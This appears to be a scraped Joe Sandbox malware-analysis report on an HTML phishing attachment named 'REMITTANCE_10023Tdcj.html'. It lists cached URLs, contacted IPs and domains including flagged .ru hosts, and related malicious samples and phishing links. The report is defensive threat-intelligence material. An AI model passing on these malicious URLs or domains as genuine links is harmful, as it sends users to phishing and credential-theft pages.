                                                                          https://tc39.es/ecma262/#sec-array.prototype.includeschromecache_205.2.dr, chromecache_206.2.drfalse
                                                                            high
                                                                            https://content.powerapps.com/resource/powerbiwfe/styles/visuals.min.4a1a13972da0a85c167f.csschromecache_303.2.dr, chromecache_214.2.drfalse
                                                                              high
                                                                              https://content.powerapps.com/resource/powerbiwfechromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                high
                                                                                https://content.powerapps.com/resource/powerbiwfe/scripts/jquery-ui.min.54471b21b524931a54a1.jschromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                  high
                                                                                  https://tc39.es/ecma262/#sec-object.setprototypeofchromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://content.powerapps.com/resource/powerbiwfe/styles/powerBIProvidersCommon.min.000a70741198babfchromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                    high
                                                                                    https://tc39.es/ecma262/#sec-hasownpropertychromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://pbiadx.powerbi.comchromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://wiki.jqueryui.com/Globalizechromecache_331.2.dr, chromecache_307.2.drfalse
                                                                                      high
                                                                                      https://outlook.live.com/owa/?nlp=1chromecache_188.2.dr, chromecache_250.2.drfalse
                                                                                        high
                                                                                        https://pbides.powerbi.comchromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                          high
                                                                                          http://interactjs.io/docs/#resize-squarechromecache_228.2.dr, chromecache_219.2.drfalse
                                                                                            high
                                                                                            https://cdn.jsdelivr.net/npm/bluebirdchromecache_350.2.dr, chromecache_260.2.drfalse
                                                                                              high
                                                                                              https://github.com/scottjehl/picturefill/blob/master/Authors.txt;chromecache_320.2.drfalse
                                                                                                high
                                                                                                https://eastus-8.in.applicationinsights.azure.com/chromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                  high
                                                                                                  https://portal.office.comchromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                    high
                                                                                                    https://tc39.es/ecma262/#sec-tointegerorinfinitychromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://dc.services.visualstudio.comchromecache_334.2.dr, chromecache_330.2.drfalse
                                                                                                      high
                                                                                                      https://pbivisuals.powerbi.comchromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                        high
                                                                                                        https://tc39.es/ecma262/#sec-requireobjectcoerciblechromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://jscompress.com/chromecache_228.2.dr, chromecache_219.2.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://github.com/w3c/aria-practices/pull/1757chromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                                          high
                                                                                                          https://axios-http.comchromecache_213.2.dr, chromecache_324.2.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://openjsf.org/chromecache_257.2.dr, chromecache_297.2.dr, chromecache_228.2.dr, chromecache_219.2.drfalse
                                                                                                            high
                                                                                                            https://aka.ms/contact-supportchromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                              high
                                                                                                              https://outlook-sdf.live.com/mail/chromecache_317.2.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://github.com/jquery/globalizechromecache_223.2.dr, chromecache_302.2.drfalse
                                                                                                                high
                                                                                                                https://keycode.info/table-of-all-keycodeschromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://tc39.es/ecma262/#sec-getmethodchromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://content.powerapps.com/resource/powerbiwfe/styles/powerBICommon.min.0a88a17616f1e34fa71c.csschromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                  high
                                                                                                                  https://www.skype.com/en/chromecache_202.2.drfalse
                                                                                                                    high
                                                                                                                    https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/key/Key_Valueschromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                                                      high
                                                                                                                      https://github.com/imakewebthings/waypoints/blog/master/licenses.txtchromecache_228.2.dr, chromecache_219.2.drfalse
                                                                                                                        high
                                                                                                                        https://content.powerapps.com/resource/powerbiwfe/styles/powerbi.common.externals.min.45febe62502627chromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                          high
                                                                                                                          https://content.powerapps.com/resource/powerbiwfe/scripts/require.min.c1195d49355cee73bd97.jschromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                            high
                                                                                                                            https://raw.github.com/taye/interact.js/master/LICENSEchromecache_228.2.dr, chromecache_219.2.drfalse
                                                                                                                              high
                                                                                                                              https://github.com/axios/axios/issueschromecache_213.2.dr, chromecache_324.2.drfalse
                                                                                                                                high
                                                                                                                                https://elad.medium.com/css-position-sticky-how-it-really-works-54cd01dc2d46chromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://underscorejs.org/LICENSEchromecache_257.2.dr, chromecache_297.2.dr, chromecache_228.2.dr, chromecache_219.2.drfalse
                                                                                                                                  high
                                                                                                                                  https://content.powerapps.com/resource/powerbiwfe/scripts/jquery.min.c8e1c8b386dc5b7a9184.jschromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                                    high
                                                                                                                                    https://aka.ms/fabricibizachromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                                      high
                                                                                                                                      https://jquery.com/chromecache_311.2.dr, chromecache_343.2.drfalse
                                                                                                                                        high
                                                                                                                                        https://playground.powerbi.com/chromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://github.com/gromo/jquery.scrollbar/chromecache_228.2.dr, chromecache_219.2.drfalse
                                                                                                                                          high
                                                                                                                                          https://tc39.es/ecma262/#sec-array.prototype.indexofchromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                                                                            high
                                                                                                                                            https://tc39.es/ecma262/#sec-tolengthchromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://content.powerapps.com/resource/powerbiwfe/scripts/polyfills.min.b0ad25daead656e47c0a.jschromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                                              high
                                                                                                                                              https://portal.office.com/adminportal/home#/catalogchromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                                                high
                                                                                                                                                https://breeze.aimon.applicationinsights.iochromecache_334.2.dr, chromecache_330.2.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slotchromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                                                                                    high
                                                                                                                                                    http://schema.org/Organizationchromecache_202.2.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://api.powerbi.comchromecache_214.2.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://app.pbiwebcontent.com/webcontentsandbox.htmlchromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://sizzlejs.com/chromecache_311.2.dr, chromecache_343.2.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://interactjs.io/docs/snappingchromecache_228.2.dr, chromecache_219.2.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://js.foundation/chromecache_311.2.dr, chromecache_343.2.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://pbirfx.powerbi.comchromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://pbilhe.powerbi.comchromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://msonecloudapifd-c7cndkdmc9c3d7e3.z01.azurefd.netchromecache_173.2.dr, chromecache_271.2.drfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://pbidpe.powerbi.comchromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://github.com/jquery/PEPchromecache_228.2.dr, chromecache_219.2.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://npms.io/search?q=ponyfill.chromecache_257.2.dr, chromecache_297.2.dr, chromecache_228.2.dr, chromecache_219.2.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.xbox.com/en-us/games/store/xbox-game-pass-ultimate/cfq7ttc0khs0?icid=CNavAllXboxGamePasschromecache_202.2.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://bugzil.la/548397chromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          http://jquery.org/licensechromecache_223.2.dr, chromecache_302.2.dr, chromecache_228.2.dr, chromecache_219.2.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://tc39.es/ecma262/#sec-lengthofarraylikechromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://content.powerapps.com/resource/powerbiwfe/scripts/jquery.globalize/globalize.culture.en-US.0chromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot-aecchromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://tc39.es/ecma262/#sec-iscallablechromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              http://scottjehl.github.io/picturefillchromecache_268.2.dr, chromecache_320.2.drfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://dev.azure.com/powerbi/PowerBIClients/_git/PowerBIClients/pullrequest/131629)chromecache_228.2.dr, chromecache_219.2.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://tc39.es/ecma262/#sec-object.definepropertychromecache_205.2.dr, chromecache_206.2.drfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://content.powerapps.com/resource/powerbiwfe/scripts/teamsTelemetry.bundle.min.34c9b7c9fab687eachromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://content.powerapps.com/resource/powerbiwfe/styles/powerbi.min.56ad1156c9c0457aab81.csschromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://github.com/requirejs/requirejs/blob/master/LICENSEchromecache_228.2.dr, chromecache_219.2.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://pbispc.powerbi.comchromecache_303.2.dr, chromecache_214.2.drfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://microsoftit.pkgs.visualstudio.com/OneITVSO/_packaging/CSM-SITES-AEMFoundations/npm/registry/chromecache_213.2.dr, chromecache_324.2.drfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                      104.18.94.41
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      151.101.66.137
                                                                                                                                                                                      code.jquery.comUnited States
                                                                                                                                                                                      54113FASTLYUSfalse
                                                                                                                                                                                      151.101.194.137
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      54113FASTLYUSfalse
                                                                                                                                                                                      35.190.80.1
                                                                                                                                                                                      a.nel.cloudflare.comUnited States
                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                      172.67.189.38
                                                                                                                                                                                      mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ruUnited States
                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      104.17.24.14
                                                                                                                                                                                      cdnjs.cloudflare.comUnited States
                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      104.21.65.72
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      20.38.136.70
                                                                                                                                                                                      waws-prod-dxb-b24c6da5.sip.p.azurewebsites.windows.netUnited States
                                                                                                                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                      69.49.245.172
                                                                                                                                                                                      bookworkstudio.netUnited States
                                                                                                                                                                                      46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                                      104.18.95.41
                                                                                                                                                                                      challenges.cloudflare.comUnited States
                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      142.250.181.100
                                                                                                                                                                                      www.google.comUnited States
                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                      239.255.255.250
                                                                                                                                                                                      unknownReserved
                                                                                                                                                                                      unknownunknownfalse
                                                                                                                                                                                      104.21.73.64
                                                                                                                                                                                      21.zomelore.ruUnited States
                                                                                                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                                                                                                      104.17.25.14
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      IP
                                                                                                                                                                                      192.168.2.4
                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                      Analysis ID:1573438
                                                                                                                                                                                      Start date and time:2024-12-12 00:27:49 +01:00
                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                      Overall analysis duration:0h 9m 18s
                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                      Report type:full
                                                                                                                                                                                      Cookbook file name:defaultwindowshtmlcookbook.jbs
                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                      Number of analysed new started processes analysed:7
                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                      Technologies:
                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                      Sample name:REMITTANCE_10023Tdcj.html
                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                      Classification:mal76.phis.evad.winHTML@30/294@61/15
                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                      • Found application associated with file extension: .html
                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 172.217.21.35, 64.233.162.84, 172.217.17.46, 172.217.17.78, 172.217.19.202, 172.217.21.42, 172.217.19.170, 172.217.19.234, 216.58.208.234, 172.217.17.42, 142.250.181.138, 142.250.181.74, 172.217.17.74, 142.250.181.106, 217.20.58.100, 192.229.221.95, 20.233.12.48, 23.206.97.11, 2.16.158.27, 2.16.158.42, 172.217.17.35, 152.199.19.160, 151.101.1.181, 151.101.65.181, 151.101.129.181, 151.101.193.181, 2.18.110.57, 20.38.136.208, 142.250.181.10, 172.217.19.206, 40.126.53.21, 20.190.181.4, 20.190.181.6, 40.126.53.14, 40.126.53.17, 40.126.53.6, 20.231.128.67, 40.126.53.18, 20.50.88.244, 20.50.88.238, 2.18.109.164, 20.12.23.50, 13.107.246.63
                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): bot-framework.azureedge.net, bot-framework.ec.azureedge.net, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, clientservices.googleapis.com, ak.privatelink.msidentity.com, e11290.dspg.akamaiedge.net, www.microsoft.com-c-3.edgekey.net, clients2.google.com, ocsp.digicert.com, powerbi-publicip-uaenorth.uaenorth.cloudapp.azure.com, update.googleapis.com, san-ion.secure4.scene7.com.edgekey.net, fs.microsoft.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, aadcdn.msauth.net, edgedl.me.gvt1.com, powerbi.microsoft.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, powerbi-global.trafficmanager.net, gig-ai-g-prod-westeurope-1-app-v4-tag.westeurope.cloudapp.azure.com, wabi-uae-north-a-primary-comp-ev2.uaenorth.cloudapp.azure.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, go.microsoft.com, redirector.gvt1.com, pa-static-ms.afd.azureedge.net, login.mso.msidentity.com, gig-ai-g-prod-westeurope-3-app-v4-tag.westeurope.clou
                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                      • VT rate limit hit for: REMITTANCE_10023Tdcj.html
                                                                                                                                                                                      No simulations
                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      104.18.94.41https://securedacusa.com/?verGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        Review_Approval_rocjr.pdfGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                                                                                                          https://owotabua.cloudfederalservices.com/F3A4kGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            https://18QDy4sM2G.lomidore.ru/baSDU4o/#Daccounting@harborwholesale.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                http://eon.keit.re.kr/WEOMTRACK.html?CPKN=O&CPSQ=88327186&CPSC=0&CPID=16122900000005&CPMEM=MTAwMDkwODg=&CLID=006&CLKN=CL&CPCED=20171231&DRTMF=5&DRTMT=60&URL=https://ncbx.qantumleap.ru/ejjH4o7kVaWIANfJxQHdbgws_rV8/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  https://www.google.com/url?cad=XpPkDfJXVS0Y&cd=tS6T8Tiw9XH&esrc=nNeW8FA0xys8Em2FL&q=https://www.google.com/url?q=https://www.google.co.uk/url?q=https://www.google.co.uk/url?q=https://www.google.com/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XSwDnNeW8yycT&sa=t&source&uact&url=amp/statementrequestbqaa921pdf.uscourt-docs.com/0DGW4/&ved=xjnktlqryYWwZIBRrgvKGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    https://prezi.com/i/wuualyitwcxt/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                      Carisls Open Benefits Enrollment.emlGet hashmaliciousunknownBrowse
                                                                                                                                                                                                        https://k24ff6gz45c4x46.s3.us-east-2.amazonaws.com/jju7km098u77gg/jj8hvff47g8iiu8/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          151.101.66.137http://novo.oratoriomariano.com/novo/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • code.jquery.com/jquery-3.3.1.min.js
                                                                                                                                                                                                          http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • code.jquery.com/jquery-1.7.min.js
                                                                                                                                                                                                          http://site9615380.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • code.jquery.com/jquery-1.7.2.min.js
                                                                                                                                                                                                          http://grandprairie-water-damage-restoration.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • code.jquery.com/jquery-3.3.1.min.js
                                                                                                                                                                                                          2023121142000021ki01kvjs.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • code.jquery.com/jquery-latest.min.js
                                                                                                                                                                                                          151.101.194.137http://facebooksecurity.blogspot.dk/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • code.jquery.com/jquery-1.7.min.js
                                                                                                                                                                                                          http://soporte-store.info/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • code.jquery.com/jquery-1.11.3.min.js
                                                                                                                                                                                                          http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • code.jquery.com/jquery-1.11.3.min.js
                                                                                                                                                                                                          http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • code.jquery.com/jquery-1.9.1.js
                                                                                                                                                                                                          http://facebooksecurity.blogspot.pe/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • code.jquery.com/jquery-1.7.min.js
                                                                                                                                                                                                          https://tracker.club-os.com/campaign/click?qDomYmsgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=demsaenlinea.mx/jahn/00987667839933/utilities@affordablecare.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • code.jquery.com/jquery-3.3.1.min.js
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          challenges.cloudflare.comhttps://securedacusa.com/?verGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.18.94.41
                                                                                                                                                                                                          Review_Approval_rocjr.pdfGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                                                                                                                          • 104.18.94.41
                                                                                                                                                                                                          vFile__0054seconds__Arkansas.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.18.95.41
                                                                                                                                                                                                          https://owotabua.cloudfederalservices.com/F3A4kGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.18.95.41
                                                                                                                                                                                                          https://18QDy4sM2G.lomidore.ru/baSDU4o/#Daccounting@harborwholesale.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.18.95.41
                                                                                                                                                                                                          Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 104.18.95.41
                                                                                                                                                                                                          http://eon.keit.re.kr/WEOMTRACK.html?CPKN=O&CPSQ=88327186&CPSC=0&CPID=16122900000005&CPMEM=MTAwMDkwODg=&CLID=006&CLKN=CL&CPCED=20171231&DRTMF=5&DRTMT=60&URL=https://ncbx.qantumleap.ru/ejjH4o7kVaWIANfJxQHdbgws_rV8/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.18.94.41
                                                                                                                                                                                                          vReport__43281seconds__Ccorralejo.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.18.95.41
                                                                                                                                                                                                          https://www.google.com/url?cad=XpPkDfJXVS0Y&cd=tS6T8Tiw9XH&esrc=nNeW8FA0xys8Em2FL&q=https://www.google.com/url?q=https://www.google.co.uk/url?q=https://www.google.co.uk/url?q=https://www.google.com/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XSwDnNeW8yycT&sa=t&source&uact&url=amp/statementrequestbqaa921pdf.uscourt-docs.com/0DGW4/&ved=xjnktlqryYWwZIBRrgvKGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.18.95.41
                                                                                                                                                                                                          https://prezi.com/i/wuualyitwcxt/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 104.18.94.41
                                                                                                                                                                                                          cdnjs.cloudflare.comphish_alert_iocp_v1.4.48 - 2024-12-11T151927.331.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                          https://payment-gateway.horizoncloud.com/api/hpay/payment-link/payment/9528d20e-10a3-4245-92c0-ceae8c656055?zipCode=&showTip=FalseGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                          vFile__0054seconds__Arkansas.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.17.24.14
                                                                                                                                                                                                          https://computeroids.com/hp-printer-driver?utm_source=Google&utm_medium=Click&utm_campaign=HP&utm_term=%7Bkeywords%7D&utm_content=%7Bmedium%7D&tm=tt&ap=gads&aaid=adaHxflMmgPq7&camp_id=12260099411&ad_g_id=118845692873&keyword=install%20hp%20printer%20to%20computer&device=c&network=searchAd&adposition=&gad_source=5&gclid=EAIaIQobChMI0JDUvuabigMV_Uf_AR2MuQCMEAAYASAAEgKQMPD_BwEGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                          • 104.17.24.14
                                                                                                                                                                                                          https://owotabua.cloudfederalservices.com/F3A4kGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.17.24.14
                                                                                                                                                                                                          https://18QDy4sM2G.lomidore.ru/baSDU4o/#Daccounting@harborwholesale.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                          Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                          View_alert_details_#[01KTO].htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.17.24.14
                                                                                                                                                                                                          Final Demand to Harbor Wholesale Grocery Inc.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                          http://eon.keit.re.kr/WEOMTRACK.html?CPKN=O&CPSQ=88327186&CPSC=0&CPID=16122900000005&CPMEM=MTAwMDkwODg=&CLID=006&CLKN=CL&CPCED=20171231&DRTMF=5&DRTMT=60&URL=https://ncbx.qantumleap.ru/ejjH4o7kVaWIANfJxQHdbgws_rV8/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                          code.jquery.comhttps://newdocumentsproposal.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                                                                                                                          • 151.101.130.137
                                                                                                                                                                                                          Review_Approval_rocjr.pdfGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                                                                                                                          • 151.101.66.137
                                                                                                                                                                                                          vFile__0054seconds__Arkansas.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 151.101.2.137
                                                                                                                                                                                                          https://owotabua.cloudfederalservices.com/F3A4kGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 151.101.2.137
                                                                                                                                                                                                          https://18QDy4sM2G.lomidore.ru/baSDU4o/#Daccounting@harborwholesale.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 151.101.194.137
                                                                                                                                                                                                          https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                          • 151.101.2.137
                                                                                                                                                                                                          Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 151.101.130.137
                                                                                                                                                                                                          http://eon.keit.re.kr/WEOMTRACK.html?CPKN=O&CPSQ=88327186&CPSC=0&CPID=16122900000005&CPMEM=MTAwMDkwODg=&CLID=006&CLKN=CL&CPCED=20171231&DRTMF=5&DRTMT=60&URL=https://ncbx.qantumleap.ru/ejjH4o7kVaWIANfJxQHdbgws_rV8/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 151.101.130.137
                                                                                                                                                                                                          vReport__43281seconds__Ccorralejo.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 151.101.194.137
                                                                                                                                                                                                          https://www.google.com/url?cad=XpPkDfJXVS0Y&cd=tS6T8Tiw9XH&esrc=nNeW8FA0xys8Em2FL&q=https://www.google.com/url?q=https://www.google.co.uk/url?q=https://www.google.co.uk/url?q=https://www.google.com/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XSwDnNeW8yycT&sa=t&source&uact&url=amp/statementrequestbqaa921pdf.uscourt-docs.com/0DGW4/&ved=xjnktlqryYWwZIBRrgvKGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 151.101.194.137
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          CLOUDFLARENETUSphish_alert_iocp_v1.4.48 - 2024-12-11T151927.331.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                          SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 172.67.176.240
                                                                                                                                                                                                          jew.ppc.elfGet hashmaliciousUnknownBrowse
